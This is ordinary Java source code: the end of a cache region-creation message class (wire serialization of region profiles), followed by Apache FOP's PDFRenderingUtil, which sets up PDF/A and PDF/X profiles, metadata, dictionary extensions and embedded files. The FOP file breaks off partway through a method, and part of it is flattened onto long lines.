        skip = !dr.getGenerateVersionTag();
      }
      return skip || isLocalOrRemoteAccessor(rgn, profile);
    }

    /**
     * @return true if profile being exchanged or region is an accessor i.e has no storage
     */
    protected static boolean isLocalOrRemoteAccessor(CacheDistributionAdvisee region,
        CacheProfile profile) {
      return isLocalAccessor(region) || isRemoteAccessor(profile);
    }

    /** true if this member's region has no storage (proxy, or PR with localMaxMemory 0) */
    protected static boolean isLocalAccessor(CacheDistributionAdvisee region) {
      if (!region.getAttributes().getDataPolicy().withStorage()) {
        return true;
      }
      return region.getAttributes().getPartitionAttributes() != null
          && region.getAttributes().getPartitionAttributes().getLocalMaxMemory() == 0;
    }

    /** true if the remote member's profile describes a storage-less region */
    protected static boolean isRemoteAccessor(CacheProfile profile) {
      if (!profile.dataPolicy.withStorage()) {
        return true;
      }
      if (profile.isPartitioned) {
        PartitionProfile prProfile = (PartitionProfile) profile;
        return prProfile.localMaxMemory == 0;
      }
      return false;
    }

    @Override
    public void reset() {
      super.reset();
      regionPath = null;
      profile = null;
      processorId = -1;
    }

    // NOTE: field order in fromData/toData is the wire format — keep them in sync
    @Override
    public void fromData(DataInput in, DeserializationContext context)
        throws IOException, ClassNotFoundException {
      super.fromData(in, context);
      regionPath = DataSerializer.readString(in);
      profile = DataSerializer.readObject(in);
      processorId = in.readInt();
      concurrencyChecksEnabled = in.readBoolean();
    }

    @Override
    public int getDSFID() {
      return CREATE_REGION_MESSAGE;
    }

    @Override
    public void toData(DataOutput out, SerializationContext context) throws IOException {
      super.toData(out, context);
      DataSerializer.writeString(regionPath, out);
      DataSerializer.writeObject(profile, out);
      out.writeInt(processorId);
      out.writeBoolean(concurrencyChecksEnabled);
    }

    @Override
    public String toString() {
      return "CreateRegionMessage (region='" + regionPath + "'; processorId=" + processorId
          + "; concurrencyChecksEnabled=" + concurrencyChecksEnabled + "; profile=" + profile + ")";
    }
  }

  /**
   * Reply carrying the responder's profile (plus bucket profiles / event state for
   * partitioned regions) back to the member creating the region.
   */
  public static class CreateRegionReplyMessage extends ReplyMessage {
    protected CacheProfile profile;

    protected ArrayList bucketProfiles;

    protected Object eventState;

    /**
     * Added to fix 42051. If the region is in the middle of being destroyed, return the destroyed
     * profile
     */
    protected PersistentMemberID destroyedId;

    // true if the responder was not initialized and skipped compatibility checks
    protected boolean skippedCompatibilityChecks;

    // WAN sequence key for bucket regions; -1 when not applicable
    long seqKeyForWan = -1;

    @Override
    public int getDSFID() {
      return CREATE_REGION_REPLY_MESSAGE;
    }

    @Override
    public boolean sendViaUDP() {
      return true;
    }

    // NOTE: read order here mirrors the write order in toData — keep them in sync
    @Override
    public void fromData(DataInput in, DeserializationContext context)
        throws IOException, ClassNotFoundException {
      super.fromData(in, context);
      if (in.readBoolean()) {
        profile = DataSerializer.readObject(in);
      }
      int size = in.readInt();
      if (size == 0) {
        bucketProfiles = null;
      } else {
        bucketProfiles = new ArrayList(size);
        for (int i = 0; i < size; i++) {
          RegionAdvisor.BucketProfileAndId bp = new RegionAdvisor.BucketProfileAndId();
          InternalDataSerializer.invokeFromData(bp, in);
          bucketProfiles.add(bp);
        }
      }
      if (in.readBoolean()) {
        eventState = EventStateHelper.deDataSerialize(in, false);
      }
      if (in.readBoolean()) {
        destroyedId = new PersistentMemberID();
        InternalDataSerializer.invokeFromData(destroyedId, in);
      }
      skippedCompatibilityChecks = in.readBoolean();
      seqKeyForWan = in.readLong();
    }

    @Override
    public void toData(DataOutput out, SerializationContext context) throws IOException {
      super.toData(out, context);
      out.writeBoolean(profile != null);
      if (profile != null) {
        DataSerializer.writeObject(profile, out);
      }
      if (bucketProfiles == null) {
        out.writeInt(0);
      } else {
        int size = bucketProfiles.size();
        out.writeInt(size);
        for (Object bucketProfile : bucketProfiles) {
          RegionAdvisor.BucketProfileAndId bp = (RegionAdvisor.BucketProfileAndId) bucketProfile;
          InternalDataSerializer.invokeToData(bp, out);
        }
      }
      if (eventState != null) {
        out.writeBoolean(true);
        // The isHARegion flag is false here because
        // we currently only include the event state in the profile
        // for bucket regions.
        EventStateHelper.dataSerialize(out, (Map) eventState, false, getSender());
      } else {
        out.writeBoolean(false);
      }
      if (destroyedId != null) {
        out.writeBoolean(true);
        InternalDataSerializer.invokeToData(destroyedId, out);
      } else {
        out.writeBoolean(false);
      }
      out.writeBoolean(skippedCompatibilityChecks);
      out.writeLong(seqKeyForWan);
    }

    @Override
    public String toString() {
      StringBuilder buff = new StringBuilder();
      buff.append("CreateRegionReplyMessage");
      buff.append("(sender=").append(getSender());
      buff.append("; processorId=");
      buff.append(super.processorId);
      buff.append("; profile=");
      buff.append(profile);
      if (bucketProfiles != null) {
        buff.append("; bucketProfiles=");
        buff.append(bucketProfiles);
      }
      if (eventState != null) {
        buff.append("; eventState=<not null>");
      }
      buff.append("; skippedCompatibilityChecks=");
      buff.append(skippedCompatibilityChecks);
      buff.append("; seqKeyForWan=");
      buff.append(seqKeyForWan);
      if (getException() != null) {
        buff.append("; with exception {").append(getException().getMessage()).append("}");
      }
      buff.append(")");
      return buff.toString();
    }
  }
}
apache/xmlgraphics-fop
36,120
fop-core/src/main/java/org/apache/fop/render/pdf/PDFRenderingUtil.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /* $Id$ */ package org.apache.fop.render.pdf; import java.awt.color.ICC_Profile; import java.io.FileNotFoundException; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.URI; import java.net.URISyntaxException; import java.util.ArrayList; import java.util.Date; import java.util.EnumMap; import java.util.List; import java.util.Map; import java.util.TimeZone; import org.apache.commons.io.IOUtils; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.apache.xmlgraphics.java2d.color.profile.ColorProfileUtil; import org.apache.xmlgraphics.util.DateFormatUtil; import org.apache.xmlgraphics.xmp.Metadata; import org.apache.xmlgraphics.xmp.schemas.DublinCoreSchema; import org.apache.xmlgraphics.xmp.schemas.XMPBasicAdapter; import org.apache.xmlgraphics.xmp.schemas.XMPBasicSchema; import org.apache.fop.accessibility.Accessibility; import org.apache.fop.apps.FOUserAgent; import org.apache.fop.apps.io.InternalResourceResolver; import org.apache.fop.fo.extensions.ExtensionAttachment; import org.apache.fop.fo.extensions.xmp.XMPMetadata; import org.apache.fop.pdf.PDFAMode; import org.apache.fop.pdf.PDFArray; import 
org.apache.fop.pdf.PDFConformanceException; import org.apache.fop.pdf.PDFDictionary; import org.apache.fop.pdf.PDFDocument; import org.apache.fop.pdf.PDFEmbeddedFile; import org.apache.fop.pdf.PDFEmbeddedFiles; import org.apache.fop.pdf.PDFEncryptionManager; import org.apache.fop.pdf.PDFEncryptionParams; import org.apache.fop.pdf.PDFFileSpec; import org.apache.fop.pdf.PDFICCBasedColorSpace; import org.apache.fop.pdf.PDFICCStream; import org.apache.fop.pdf.PDFInfo; import org.apache.fop.pdf.PDFLayer; import org.apache.fop.pdf.PDFMetadata; import org.apache.fop.pdf.PDFName; import org.apache.fop.pdf.PDFNames; import org.apache.fop.pdf.PDFNavigator; import org.apache.fop.pdf.PDFNull; import org.apache.fop.pdf.PDFNumber; import org.apache.fop.pdf.PDFOutputIntent; import org.apache.fop.pdf.PDFPage; import org.apache.fop.pdf.PDFPageLabels; import org.apache.fop.pdf.PDFReference; import org.apache.fop.pdf.PDFSetOCGStateAction; import org.apache.fop.pdf.PDFSignParams; import org.apache.fop.pdf.PDFTransitionAction; import org.apache.fop.pdf.PDFXMode; import org.apache.fop.pdf.Version; import org.apache.fop.pdf.VersionController; import org.apache.fop.render.pdf.extensions.PDFActionExtension; import org.apache.fop.render.pdf.extensions.PDFArrayExtension; import org.apache.fop.render.pdf.extensions.PDFCollectionEntryExtension; import org.apache.fop.render.pdf.extensions.PDFDictionaryAttachment; import org.apache.fop.render.pdf.extensions.PDFDictionaryExtension; import org.apache.fop.render.pdf.extensions.PDFDictionaryType; import org.apache.fop.render.pdf.extensions.PDFEmbeddedFileAttachment; import org.apache.fop.render.pdf.extensions.PDFObjectType; import org.apache.fop.render.pdf.extensions.PDFPageExtension; import org.apache.fop.render.pdf.extensions.PDFReferenceExtension; import static org.apache.fop.render.pdf.PDFEncryptionOption.ENCRYPTION_PARAMS; import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_ACCESSCONTENT; import static 
org.apache.fop.render.pdf.PDFEncryptionOption.NO_ANNOTATIONS;
import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_ASSEMBLEDOC;
import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_COPY_CONTENT;
import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_EDIT_CONTENT;
import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_FILLINFORMS;
import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_PRINT;
import static org.apache.fop.render.pdf.PDFEncryptionOption.NO_PRINTHQ;
import static org.apache.fop.render.pdf.PDFEncryptionOption.OWNER_PASSWORD;
import static org.apache.fop.render.pdf.PDFEncryptionOption.USER_PASSWORD;

/**
 * Utility class which enables all sorts of features that are not directly connected to the
 * normal rendering process.
 */
class PDFRenderingUtil {

    /** logging instance */
    private static Log log = LogFactory.getLog(PDFRenderingUtil.class);

    /** user agent supplying renderer options, metadata and resource resolution */
    private FOUserAgent userAgent;

    /** the PDF Document being created */
    private PDFDocument pdfDoc;

    /** merged renderer configuration (defaults + user agent + explicit merges) */
    private PDFRendererOptionsConfig rendererConfig;

    /** the ICC stream used as output profile by this document for PDF/A and PDF/X functionality. */
    private PDFICCStream outputProfile;

    /** the default sRGB color space.
     */
    private PDFICCBasedColorSpace sRGBColorSpace;

    PDFRenderingUtil(FOUserAgent userAgent) {
        this.userAgent = userAgent;
        initialize();
    }

    /** Builds the effective renderer config; PDF/A Level A forces accessibility on. */
    private void initialize() {
        rendererConfig = PDFRendererOptionsConfig.DEFAULT.merge(createFromUserAgent(userAgent));
        if (rendererConfig.getPDFAMode().isLevelA()) {
            // PDF/A Level A requires tagged PDF
            userAgent.getRendererOptions().put(Accessibility.ACCESSIBILITY, Boolean.TRUE);
        }
    }

    /** Collects every PDFRendererOption (parsed) plus encryption params from the user agent. */
    protected static PDFRendererOptionsConfig createFromUserAgent(FOUserAgent userAgent) {
        Map<PDFRendererOption, Object> properties
                = new EnumMap<PDFRendererOption, Object>(PDFRendererOption.class);
        for (PDFRendererOption option : PDFRendererOption.values()) {
            Object value = userAgent.getRendererOption(option);
            properties.put(option, option.parse(value));
        }
        PDFEncryptionParams encryptionConfig = new EncryptionParamsBuilder().createParams(userAgent);
        return new PDFRendererOptionsConfig(properties, encryptionConfig);
    }

    /** Overlays the given config on top of the current one (given config wins). */
    void mergeRendererOptionsConfig(PDFRendererOptionsConfig config) {
        rendererConfig = rendererConfig.merge(config);
    }

    /** Copies document metadata (creator, dates, author, ...) from the user agent into the PDF Info dict. */
    private void updateInfo() {
        PDFInfo info = pdfDoc.getInfo();
        info.setCreator(userAgent.getCreator());
        info.setCreationDate(userAgent.getCreationDate());
        info.setAuthor(userAgent.getAuthor());
        info.setTitle(userAgent.getTitle());
        info.setSubject(userAgent.getSubject());
        info.setKeywords(userAgent.getKeywords());
    }

    /** Transfers the configured PDF/A, PDF/UA, PDF/X and PDF/VT modes onto the document profile. */
    private void updatePDFProfiles() {
        pdfDoc.getProfile().setPDFAMode(rendererConfig.getPDFAMode());
        pdfDoc.getProfile().setPDFUAMode(rendererConfig.getPDFUAMode());
        userAgent.setPdfUAEnabled(pdfDoc.getProfile().getPDFUAMode().isEnabled());
        pdfDoc.getProfile().setPDFXMode(rendererConfig.getPDFXMode());
        pdfDoc.getProfile().setPDFVTMode(rendererConfig.getPDFVTMode());
    }

    /**
     * Registers sRGB as the default RGB color space, unless explicitly disabled.
     * Disabling it is rejected when PDF/A, PDF/X or an output profile is configured.
     */
    private void addsRGBColorSpace() throws IOException {
        if (rendererConfig.getDisableSRGBColorSpace()) {
            if (rendererConfig.getPDFAMode() != PDFAMode.DISABLED
                    || rendererConfig.getPDFXMode() != PDFXMode.DISABLED
                    || rendererConfig.getOutputProfileURI() != null) {
                throw new IllegalStateException("It is not possible to disable the sRGB color"
                        + " space if PDF/A or PDF/X functionality is enabled or an"
                        + " output profile is set!");
            }
        } else {
            if (this.sRGBColorSpace != null) {
                return; // already set up
            }
            //Map sRGB as default RGB profile for DeviceRGB
            this.sRGBColorSpace = PDFICCBasedColorSpace.setupsRGBAsDefaultRGBColorSpace(pdfDoc);
        }
    }

    /**
     * Lazily resolves the output ICC profile: loads the configured profile URI if set,
     * otherwise falls back to the sRGB color space's ICC stream.
     * NOTE(review): the sRGB fallback assumes addsRGBColorSpace() ran first and sRGB was
     * not disabled, else sRGBColorSpace is null here — confirm caller ordering.
     */
    private void addDefaultOutputProfile() throws IOException {
        if (this.outputProfile != null) {
            return; // already resolved
        }
        ICC_Profile profile;
        InputStream in = null;
        URI outputProfileUri = rendererConfig.getOutputProfileURI();
        if (outputProfileUri != null) {
            this.outputProfile = pdfDoc.getFactory().makePDFICCStream();
            in = userAgent.getResourceResolver().getResource(rendererConfig.getOutputProfileURI());
            try {
                profile = ColorProfileUtil.getICC_Profile(in);
            } finally {
                IOUtils.closeQuietly(in);
            }
            this.outputProfile.setColorSpace(profile, null);
        } else {
            //Fall back to sRGB profile
            outputProfile = sRGBColorSpace.getICCStream();
        }
    }

    /**
     * Adds an OutputIntent to the PDF as mandated by PDF/A-1 when uncalibrated color spaces
     * are used (which is true if we use DeviceRGB to represent sRGB colors).
     * @throws IOException in case of an I/O problem
     */
    private void addPDFA1OutputIntent() throws IOException {
        addDefaultOutputProfile();

        String desc = ColorProfileUtil.getICCProfileDescription(this.outputProfile.getICCProfile());
        PDFOutputIntent outputIntent = pdfDoc.getFactory().makeOutputIntent();
        outputIntent.setSubtype(PDFOutputIntent.GTS_PDFA1);
        outputIntent.setDestOutputProfile(this.outputProfile);
        outputIntent.setOutputConditionIdentifier(desc);
        outputIntent.setInfo(outputIntent.getOutputConditionIdentifier());
        pdfDoc.getRoot().addOutputIntent(outputIntent);
    }

    /**
     * Adds an OutputIntent to the PDF as mandated by PDF/X when uncalibrated color spaces
     * are used (which is true if we use DeviceRGB to represent sRGB colors).
     * @throws IOException in case of an I/O problem
     */
    private void addPDFXOutputIntent() throws IOException {
        addDefaultOutputProfile();

        String desc = ColorProfileUtil.getICCProfileDescription(this.outputProfile.getICCProfile());
        // PDF/X requires the DestOutputProfile to be an output device profile
        int deviceClass = this.outputProfile.getICCProfile().getProfileClass();
        if (deviceClass != ICC_Profile.CLASS_OUTPUT) {
            throw new PDFConformanceException(pdfDoc.getProfile().getPDFXMode() + " requires that"
                    + " the DestOutputProfile be an Output Device Profile. "
                    + desc + " does not match that requirement.");
        }
        PDFOutputIntent outputIntent = pdfDoc.getFactory().makeOutputIntent();
        outputIntent.setSubtype(PDFOutputIntent.GTS_PDFX);
        outputIntent.setDestOutputProfile(this.outputProfile);
        outputIntent.setOutputConditionIdentifier(desc);
        outputIntent.setInfo(outputIntent.getOutputConditionIdentifier());
        pdfDoc.getRoot().addOutputIntent(outputIntent);
    }

    /**
     * Merges FOP's own XMP metadata into the metadata supplied by the XSL-FO document
     * (Dublin Core excluded for PDF/A-1), refreshes the metadata date, syncs the Info
     * dictionary and attaches the result to the document catalog.
     */
    public void renderXMPMetadata(XMPMetadata metadata) {
        Metadata docXMP = metadata.getMetadata();
        Metadata fopXMP = PDFMetadata.createXMPFromPDFDocument(pdfDoc);
        //Merge FOP's own metadata into the one from the XSL-FO document
        List<Class> exclude = new ArrayList<Class>();
        if (pdfDoc.getProfile().getPDFAMode().isPart1()) {
            exclude.add(DublinCoreSchema.class);
        }
        fopXMP.mergeInto(docXMP, exclude);
        XMPBasicAdapter xmpBasic = XMPBasicSchema.getAdapter(docXMP);
        //Metadata was changed so update metadata date
        xmpBasic.setMetadataDate(new java.util.Date());
        PDFMetadata.updateInfoFromMetadata(docXMP, pdfDoc.getInfo());

        PDFMetadata pdfMetadata = pdfDoc.getFactory().makeMetadata(
                docXMP, metadata.isReadOnly());
        pdfDoc.getRoot().setMetadata(pdfMetadata);
    }

    /** Creates XMP metadata from the PDF Info dictionary when none was supplied. */
    public void generateDefaultXMPMetadata() {
        if (pdfDoc.getRoot().getMetadata() == null) {
            //If at this time no XMP metadata for the overall document has been set, create it
            //from the PDFInfo object.
Metadata xmp = PDFMetadata.createXMPFromPDFDocument(pdfDoc); PDFMetadata pdfMetadata = pdfDoc.getFactory().makeMetadata( xmp, true); pdfDoc.getRoot().setMetadata(pdfMetadata); } } public void renderDictionaryExtension(PDFDictionaryAttachment attachment, PDFPage currentPage) { PDFDictionaryExtension extension = attachment.getExtension(); PDFDictionaryType type = extension.getDictionaryType(); if (type == PDFDictionaryType.Action) { addNavigatorAction(extension); } else if (type == PDFDictionaryType.Layer) { addLayer(extension); } else if (type == PDFDictionaryType.Navigator) { addNavigator(extension); } else { renderDictionaryExtension(extension, currentPage); } } public void addLayer(PDFDictionaryExtension extension) { assert extension.getDictionaryType() == PDFDictionaryType.Layer; String id = extension.getProperty(PDFDictionaryExtension.PROPERTY_ID); if ((id != null) && (id.length() > 0)) { PDFLayer layer = pdfDoc.getFactory().makeLayer(id); layer.setResolver(new PDFLayer.Resolver(layer, extension) { public void performResolution() { PDFDictionaryExtension extension = (PDFDictionaryExtension) getExtension(); Object name = extension.findEntryValue("Name"); Object intent = extension.findEntryValue("Intent"); Object usage = makeDictionary(extension.findEntryValue("Usage")); getLayer().populate(name, intent, usage); } }); } } public void addNavigatorAction(PDFDictionaryExtension extension) { assert extension.getDictionaryType() == PDFDictionaryType.Action; String id = extension.getProperty(PDFDictionaryExtension.PROPERTY_ID); if ((id != null) && (id.length() > 0)) { String type = extension.getProperty(PDFActionExtension.PROPERTY_TYPE); if (type != null) { if (type.equals("SetOCGState")) { PDFSetOCGStateAction action = pdfDoc.getFactory().makeSetOCGStateAction(id); action.setResolver(new PDFSetOCGStateAction.Resolver(action, extension) { public void performResolution() { PDFDictionaryExtension extension = (PDFDictionaryExtension) getExtension(); Object state = 
makeArray(extension.findEntryValue("State")); Object preserveRB = extension.findEntryValue("PreserveRB"); Object nextAction = makeDictionaryOrArray(extension.findEntryValue("Next")); getAction().populate(state, preserveRB, nextAction); } }); } else if (type.equals("Trans")) { PDFTransitionAction action = pdfDoc.getFactory().makeTransitionAction(id); action.setResolver(new PDFTransitionAction.Resolver(action, extension) { public void performResolution() { PDFDictionaryExtension extension = (PDFDictionaryExtension) getExtension(); Object transition = makeDictionary(extension.findEntryValue("Trans")); Object nextAction = makeDictionaryOrArray(extension.findEntryValue("Next")); getAction().populate(transition, nextAction); } }); } else { throw new UnsupportedOperationException(); } } } } public void addNavigator(PDFDictionaryExtension extension) { assert extension.getDictionaryType() == PDFDictionaryType.Navigator; String id = extension.getProperty(PDFDictionaryExtension.PROPERTY_ID); if ((id != null) && (id.length() > 0)) { PDFNavigator navigator = pdfDoc.getFactory().makeNavigator(id); navigator.setResolver(new PDFNavigator.Resolver(navigator, extension) { public void performResolution() { PDFDictionaryExtension extension = (PDFDictionaryExtension) getExtension(); Object nextAction = makeDictionary(extension.findEntryValue("NA")); Object next = makeDictionary(extension.findEntryValue("Next")); Object prevAction = makeDictionary(extension.findEntryValue("PA")); Object prev = makeDictionary(extension.findEntryValue("Prev")); Object duration = extension.findEntryValue("Dur"); getNavigator().populate(nextAction, next, prevAction, prev, duration); } }); } } private Object makeArray(Object value) { if (value == null) { return null; } else if (value instanceof PDFReferenceExtension) { return resolveReference((PDFReferenceExtension) value); } else if (value instanceof List<?>) { return populateArray(new PDFArray(), (List<?>) value); } else { throw new 
IllegalArgumentException(); } } private Object populateArray(PDFArray array, List<?> entries) { for (PDFCollectionEntryExtension entry : (List<PDFCollectionEntryExtension>) entries) { PDFObjectType type = entry.getType(); if (type == PDFObjectType.Array) { array.add(makeArray(entry.getValue())); } else if (type == PDFObjectType.Boolean) { array.add(entry.getValueAsBoolean()); } else if (type == PDFObjectType.Dictionary) { array.add(makeDictionary(entry.getValue())); } else if (type == PDFObjectType.Name) { array.add(new PDFName(entry.getValueAsString())); } else if (type == PDFObjectType.Number) { array.add(new PDFNumber(entry.getValueAsNumber())); } else if (type == PDFObjectType.Reference) { assert (entry instanceof PDFReferenceExtension); array.add(resolveReference((PDFReferenceExtension) entry)); } else if (type == PDFObjectType.String) { array.add(entry.getValue()); } } return array; } private Object makeDictionary(Object value) { if (value == null) { return null; } else if (value instanceof PDFReferenceExtension) { return resolveReference((PDFReferenceExtension) value); } else if (value instanceof List<?>) { return populateDictionary(new PDFDictionary(), (List<?>) value); } else { throw new IllegalArgumentException(); } } private Object populateDictionary(PDFDictionary dictionary, List<?> entries) { for (PDFCollectionEntryExtension entry : (List<PDFCollectionEntryExtension>) entries) { PDFObjectType type = entry.getType(); String key = entry.getKey(); if (type == PDFObjectType.Array) { dictionary.put(key, makeArray(entry.getValue())); } else if (type == PDFObjectType.Boolean) { dictionary.put(key, entry.getValueAsBoolean()); } else if (type == PDFObjectType.Dictionary) { dictionary.put(key, makeDictionary(entry.getValue())); } else if (type == PDFObjectType.Name) { dictionary.put(key, new PDFName(entry.getValueAsString())); } else if (type == PDFObjectType.Number) { dictionary.put(key, new PDFNumber(entry.getValueAsNumber())); } else if (type == 
PDFObjectType.Reference) { assert (entry instanceof PDFReferenceExtension); dictionary.put(key, resolveReference((PDFReferenceExtension) entry)); } else if (type == PDFObjectType.String) { dictionary.put(key, entry.getValue()); } } return dictionary; } private Object makeDictionaryOrArray(Object value) { if (value == null) { return null; } else if (value instanceof PDFReferenceExtension) { return resolveReference((PDFReferenceExtension) value); } else if (value instanceof List<?>) { if (hasKeyedEntry((List<?>) value)) { return populateDictionary(new PDFDictionary(), (List<?>) value); } else { return populateArray(new PDFArray(), (List<?>) value); } } else { throw new IllegalArgumentException(); } } private boolean hasKeyedEntry(List<?> entries) { for (PDFCollectionEntryExtension entry : (List<PDFCollectionEntryExtension>) entries) { if (entry.getKey() != null) { return true; } } return false; } public void renderDictionaryExtension(PDFDictionaryExtension extension, PDFPage currentPage) { PDFDictionaryType type = extension.getDictionaryType(); if (type == PDFDictionaryType.Catalog) { augmentDictionary(pdfDoc.getRoot(), extension); } else if (type == PDFDictionaryType.Page) { assert extension instanceof PDFPageExtension; if (((PDFPageExtension) extension).matchesPageNumber(currentPage.getPageIndex() + 1)) { augmentDictionary(currentPage, extension); renderExtension(currentPage, extension.getExtension()); } } else if (type == PDFDictionaryType.Info) { PDFInfo info = pdfDoc.getInfo(); for (PDFCollectionEntryExtension entry : extension.getEntries()) { info.put(entry.getKey(), entry.getValueAsString()); } } else if (type == PDFDictionaryType.VT) { if (currentPage.get("DPart") != null) { augmentDictionary((PDFDictionary)currentPage.get("DPart"), extension); } } else if (type == PDFDictionaryType.PagePiece) { String date = DateFormatUtil.formatPDFDate(new Date(), TimeZone.getDefault()); if (currentPage.get("PieceInfo") == null) { currentPage.put("PieceInfo", new 
PDFDictionary()); currentPage.put("LastModified", date); } PDFDictionary d = augmentDictionary((PDFDictionary)currentPage.get("PieceInfo"), extension); d.put("LastModified", date); } else { throw new IllegalStateException(); } } private void renderExtension(PDFPage currentPage, ExtensionAttachment extension) { if (extension instanceof XMPMetadata) { XMPMetadata metadata = (XMPMetadata) extension; Metadata docXMP = metadata.getMetadata(); PDFMetadata pdfMetadata = pdfDoc.getFactory().makeMetadata(docXMP, metadata.isReadOnly()); currentPage.setMetadata(pdfMetadata); } } private PDFDictionary augmentDictionary(PDFDictionary dictionary, PDFDictionaryExtension extension) { for (PDFCollectionEntryExtension entry : extension.getEntries()) { if (entry instanceof PDFDictionaryExtension) { String[] keys = entry.getKey().split("/"); for (int i = 0; i < keys.length; i++) { if (keys[i].isEmpty()) { throw new IllegalStateException("pdf:dictionary key: " + entry.getKey() + " not valid"); } if (i == keys.length - 1) { dictionary.put(keys[i], augmentDictionary(new PDFDictionary(dictionary), (PDFDictionaryExtension) entry)); } else { PDFDictionary d = new PDFDictionary(); dictionary.put(keys[i], d); dictionary = d; } } } else if (entry instanceof PDFArrayExtension) { dictionary.put(entry.getKey(), augmentArray(new PDFArray(dictionary), (PDFArrayExtension) entry)); } else { augmentDictionary(dictionary, entry); } } return dictionary; } private void augmentDictionary(PDFDictionary dictionary, PDFCollectionEntryExtension entry) { PDFObjectType type = entry.getType(); String key = entry.getKey(); if (type == PDFObjectType.Boolean) { dictionary.put(key, entry.getValueAsBoolean()); } else if (type == PDFObjectType.Name) { dictionary.put(key, new PDFName(entry.getValueAsString())); } else if (type == PDFObjectType.Number) { dictionary.put(key, new PDFNumber(entry.getValueAsNumber())); } else if (type == PDFObjectType.Reference) { assert entry instanceof PDFReferenceExtension; 
dictionary.put(key, resolveReference((PDFReferenceExtension) entry)); } else if (type == PDFObjectType.String) { dictionary.put(key, entry.getValueAsString()); } else { throw new IllegalStateException(); } } private Object resolveReference(PDFReferenceExtension entry) { PDFReference reference = (PDFReference) entry.getResolvedReference(); if (reference == null) { reference = pdfDoc.resolveExtensionReference(entry.getReferenceId()); if (reference != null) { entry.setResolvedReference(reference); } return reference; } return PDFNull.INSTANCE; } private PDFArray augmentArray(PDFArray array, PDFArrayExtension extension) { for (PDFCollectionEntryExtension entry : extension.getEntries()) { if (entry instanceof PDFDictionaryExtension) { array.add(augmentDictionary(new PDFDictionary(array), (PDFDictionaryExtension) entry)); } else if (entry instanceof PDFArrayExtension) { array.add(augmentArray(new PDFArray(array), (PDFArrayExtension) entry)); } else { augmentArray(array, entry); } } return array; } private void augmentArray(PDFArray array, PDFCollectionEntryExtension entry) { PDFObjectType type = entry.getType(); if (type == PDFObjectType.Boolean) { array.add(entry.getValueAsBoolean()); } else if (type == PDFObjectType.Name) { array.add(new PDFName(entry.getValueAsString())); } else if (type == PDFObjectType.Number) { array.add(new PDFNumber(entry.getValueAsNumber())); } else if (type == PDFObjectType.Reference) { assert entry instanceof PDFReferenceExtension; array.add(resolveReference((PDFReferenceExtension) entry)); } else if (type == PDFObjectType.String) { array.add(entry.getValueAsString()); } else { throw new IllegalStateException(); } } public PDFDocument setupPDFDocument(OutputStream out) throws IOException { if (this.pdfDoc != null) { throw new IllegalStateException("PDFDocument already set up"); } String producer = userAgent.getProducer() != null ? 
userAgent.getProducer() : ""; final Version maxPDFVersion = rendererConfig.getPDFVersion(); if (maxPDFVersion == null) { this.pdfDoc = new PDFDocument(producer); } else { VersionController controller = VersionController.getFixedVersionController(maxPDFVersion); this.pdfDoc = new PDFDocument(producer, controller); } pdfDoc.getFactory().setEventBroadcaster(userAgent.getEventBroadcaster()); updateInfo(); updatePDFProfiles(); pdfDoc.setFilterMap(rendererConfig.getFilterMap()); pdfDoc.outputHeader(out); //Setup encryption if necessary PDFEncryptionManager.setupPDFEncryption(rendererConfig.getEncryptionParameters(), pdfDoc); addsRGBColorSpace(); if (rendererConfig.getOutputProfileURI() != null) { addDefaultOutputProfile(); } PDFXMode pdfXMode = rendererConfig.getPDFXMode(); if (pdfXMode != PDFXMode.DISABLED) { log.debug(pdfXMode + " is active."); log.warn("Note: " + pdfXMode + " support is work-in-progress and not fully implemented, yet!"); addPDFXOutputIntent(); } PDFAMode pdfAMode = rendererConfig.getPDFAMode(); if (pdfAMode.isEnabled()) { log.debug("PDF/A is active. Conformance Level: " + pdfAMode); addPDFA1OutputIntent(); } pdfDoc.enableAccessibility(userAgent.isAccessibilityEnabled()); pdfDoc.setStaticRegionsPerPageForAccessibility(userAgent.isStaticRegionsPerPageForAccessibility()); pdfDoc.setMergeFontsParams(rendererConfig.getMergeFontsParams()); pdfDoc.setMergeFormFieldsEnabled(rendererConfig.getMergeFormFieldsEnabled()); pdfDoc.setLinearizationEnabled(rendererConfig.getLinearizationEnabled()); pdfDoc.setFormXObjectEnabled(rendererConfig.getFormXObjectEnabled()); pdfDoc.setObjectStreamsEnabled(rendererConfig.getObjectStreamsEnabled()); return this.pdfDoc; } public PDFSignParams getSignParams() { return rendererConfig.getSignParams(); } /** * Generates a page label in the PDF document. 
* @param pageIndex the index of the page * @param pageNumber the formatted page number */ public void generatePageLabel(int pageIndex, String pageNumber) { //Produce page labels PDFPageLabels pageLabels = this.pdfDoc.getRoot().getPageLabels(); if (pageLabels == null) { //Set up PageLabels pageLabels = this.pdfDoc.getFactory().makePageLabels(); this.pdfDoc.getRoot().setPageLabels(pageLabels); } pageLabels.addPageLabel(pageIndex, pageNumber); } /** * Adds an embedded file to the PDF file. * @param embeddedFile the object representing the embedded file to be added * @throws IOException if an I/O error occurs */ public void addEmbeddedFile(PDFEmbeddedFileAttachment embeddedFile) throws IOException { this.pdfDoc.getProfile().verifyEmbeddedFilesAllowed(); PDFNames names = this.pdfDoc.getRoot().getNames(); if (names == null) { //Add Names if not already present names = this.pdfDoc.getFactory().makeNames(); this.pdfDoc.getRoot().setNames(names); } //Create embedded file PDFEmbeddedFile file = new PDFEmbeddedFile(); this.pdfDoc.registerObject(file); URI srcURI; try { srcURI = InternalResourceResolver.cleanURI(embeddedFile.getSrc()); } catch (URISyntaxException use) { throw new RuntimeException(use); } InputStream in = userAgent.getResourceResolver().getResource(srcURI); if (in == null) { throw new FileNotFoundException(embeddedFile.getSrc()); } try { OutputStream out = file.getBufferOutputStream(); IOUtils.copyLarge(in, out); 